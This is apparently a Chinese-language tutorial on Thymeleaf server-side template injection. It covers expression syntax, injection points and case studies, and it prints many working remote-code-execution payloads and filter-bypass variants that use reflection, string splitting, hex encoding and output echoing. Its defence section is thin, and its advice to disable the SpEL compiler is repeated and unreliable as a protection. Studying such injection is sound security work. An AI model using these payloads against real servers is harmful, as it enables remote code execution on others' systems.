Thymeleaf模板引擎注入从0到1及绕过思路<\/h1>

1. Thymeleaf基础<\/h2>

Thymeleaf是一个Java模板引擎，主要用于Web应用程序开发，特别适合与Spring框架集成。其核心特点包括：<\/p>

服务器端处理模板<\/li>
将数据模型填充到模板中生成HTML响应<\/li>
支持自然模板（可在浏览器直接查看原型）<\/li>

表达式语言(Thymeleaf Standard Expressions)<\/li> <\/ul>

2. Thymeleaf表达式语法<\/h2>

Thymeleaf使用五种标准表达式：<\/p>

变量表达式<\/strong>：${...}<\/code><\/li>
选择表达式<\/strong>：*{...}<\/code><\/li>
消息表达式<\/strong>：#{...}<\/code><\/li>
链接表达式<\/strong>：@{...}<\/code><\/li>

片段表达式<\/strong>：~{...}<\/code><\/li> <\/ol> 3. Thymeleaf模板注入原理<\/h2> 当攻击者能够控制模板内容或表达式时，可能导致服务器端代码执行。常见注入点：<\/p> 直接使用用户输入作为模板<\/li> 用户可控的模板名称<\/li> 用户可控的表达式片段<\/li> <\/ul> 4. 基本注入示例<\/h2> 4.1 简单表达式注入<\/h3> @Controller<\/span> <\/span><\/span>public<\/span> class<\/span> TestController<\/span> {<\/span> <\/span><\/span> @GetMapping<\/span>(<\/span>"\/test"<\/span>)<\/span> <\/span><\/span> public<\/span> String test<\/span>(<\/span>String username,<\/span> Model model)<\/span> {<\/span> <\/span><\/span> model.<\/span>addAttribute<\/span>(<\/span>"username"<\/span>,<\/span> username);<\/span> <\/span><\/span> return<\/span> "welcome"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>如果模板welcome.html<\/code>包含：<\/p> <p<\/span> th:text<\/span>=<\/span>"${username}"<\/span>><\/p<\/span>> <\/span><\/span><\/code><\/pre>攻击者可构造恶意输入执行表达式：<\/p> ${T(java.lang.Runtime).getRuntime().exec('calc')} <\/code><\/pre> 4.2 表达式预处理注入<\/h3> Thymeleaf支持表达式预处理，使用__${...}__<\/code>语法：<\/p> <p<\/span> th:text<\/span>=<\/span>"__${username}__"<\/span>><\/p<\/span>> <\/span><\/span><\/code><\/pre>攻击者可构造：<\/p> ${T(java.lang.Runtime).getRuntime().exec('calc')}__ <\/code><\/pre> 5. 高级注入技术<\/h2> 5.1 表达式内联<\/h3> Thymeleaf支持内联表达式，使用[[...]]<\/code>或[(...)]<\/code>：<\/p> <p<\/span>>Hello, [[${username}]]<\/p<\/span>> <\/span><\/span><\/code><\/pre>攻击者可构造：<\/p> ${T(java.lang.Runtime).getRuntime().exec('calc')} <\/code><\/pre> 5.2 URL表达式注入<\/h3> <a<\/span> th:href<\/span>=<\/span>"@{\/user\/profile(id=${userId})}"<\/span>>Profile<\/a<\/span>> <\/span><\/span><\/code><\/pre>攻击者可构造恶意userId<\/code>：<\/p> __${T(java.lang.Runtime).getRuntime().exec('calc')}__ <\/code><\/pre> 6. 沙箱绕过技术<\/h2> 6.1 反射调用绕过<\/h3> ${<\/span>#<\/span>ctx.<\/span>getVariable<\/span>(<\/span>'<\/span>param'<\/span>)}<\/span> <\/span><\/span>${<\/span>#<\/span>request.<\/span>getAttribute<\/span>(<\/span>'<\/span>param'<\/span>)}<\/span> <\/span><\/span>${<\/span>#<\/span>request.<\/span>getParameter<\/span>(<\/span>'<\/span>param'<\/span>)}<\/span> <\/span><\/span><\/code><\/pre>6.2 内置对象利用<\/h3> Thymeleaf提供多个内置对象：<\/p> #ctx<\/code>: 上下文对象<\/li> #vars<\/code>: 上下文变量<\/li> #locale<\/code>: 本地化对象<\/li> #request<\/code>: HttpServletRequest对象<\/li> #response<\/code>: HttpServletResponse对象<\/li> #session<\/code>: HttpSession对象<\/li> #servletContext<\/code>: ServletContext对象<\/li> <\/ul> 利用示例：<\/p> ${#request.getSession().setAttribute('param',T(java.lang.Runtime).getRuntime().exec('calc'))} <\/code><\/pre> 6.3 表达式预处理链式调用<\/h3> ${T(java.lang.Class).forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(java.lang.String)).invoke(T(java.lang.Class).forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(java.lang.Class).forName('java.la'+'ng.Ru'+'ntime')),'calc')} <\/code><\/pre> 7. 防御措施<\/h2> 7.1 输入验证与过滤<\/h3> 对用户输入进行严格验证<\/li> 过滤特殊字符和表达式语法<\/li> <\/ul> 7.2 使用安全配置<\/h3> @Bean<\/span> <\/span><\/span>public<\/span> TemplateEngine templateEngine<\/span>()<\/span> {<\/span> <\/span><\/span> SpringTemplateEngine templateEngine =<\/span> new<\/span> SpringTemplateEngine();<\/span> <\/span><\/span> templateEngine.<\/span>setEnableSpringELCompiler<\/span>(<\/span>false<\/span>);<\/span> <\/span><\/span> templateEngine.<\/span>setTemplateResolver<\/span>(<\/span>templateResolver());<\/span> <\/span><\/span> \/\/ 禁用不安全的表达式特性 <\/span><\/span><\/span><\/span> templateEngine.<\/span>setEnableSpringELCompiler<\/span>(<\/span>false<\/span>);<\/span> <\/span><\/span> return<\/span> templateEngine;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>7.3 使用最新版本<\/h3> 保持Thymeleaf版本更新<\/li> 关注安全公告和补丁<\/li> <\/ul> 7.4 最小权限原则<\/h3> 限制模板引擎的访问权限<\/li> 使用安全沙箱环境<\/li> <\/ul> 8. 检测与利用工具<\/h2> 手工检测<\/strong>：尝试输入${7*7}<\/code>等简单表达式<\/li> Burp Suite<\/strong>：使用Scanner模块检测<\/li> 自定义脚本<\/strong>：自动化检测和利用<\/li> <\/ol> 9. 实际案例分析<\/h2> 案例1：Spring Boot + Thymeleaf注入<\/h3> @GetMapping<\/span>(<\/span>"\/greeting"<\/span>)<\/span> <\/span><\/span>public<\/span> String greeting<\/span>(<\/span>@RequestParam<\/span>(<\/span>name=<\/span>"name"<\/span>,<\/span> required=<\/span>false<\/span>,<\/span> defaultValue=<\/span>"World"<\/span>)<\/span> String name,<\/span> Model model)<\/span> {<\/span> <\/span><\/span> model.<\/span>addAttribute<\/span>(<\/span>"name"<\/span>,<\/span> name);<\/span> <\/span><\/span> return<\/span> "greeting"<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>攻击payload：<\/p> __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x <\/code><\/pre> 案例2：模板名称注入<\/h3> @GetMapping<\/span>(<\/span>"\/dynamic"<\/span>)<\/span> <\/span><\/span>public<\/span> String dynamicTemplate<\/span>(<\/span>@RequestParam<\/span> String template)<\/span> {<\/span> <\/span><\/span> return<\/span> template;<\/span> \/\/ 直接返回用户控制的模板名称 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>攻击payload：<\/p> __${T(java.lang.Runtime).getRuntime().exec("calc")}__::x <\/code><\/pre> 10. 高级绕过技巧<\/h2> 10.1 字符拼接绕过<\/h3> ${T(java.lang.Runtime).getRuntime().exec('c'+'alc')} <\/code><\/pre> 10.2 十六进制编码<\/h3> ${T(java.lang.Runtime).getRuntime().exec('\x63\x61\x6c\x63')} <\/code><\/pre> 10.3 反射调用<\/h3> ${#this.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('calc')} <\/code><\/pre> 10.4 利用Spring EL特性<\/h3> ${T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec('calc').getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream())} <\/code><\/pre> 11. 总结<\/h2> Thymeleaf模板注入是一种严重的服务器端漏洞，攻击者可通过精心构造的表达式实现远程代码执行。防御需要从输入验证、安全配置、权限控制等多方面入手，同时保持组件更新和安全意识。<\/p>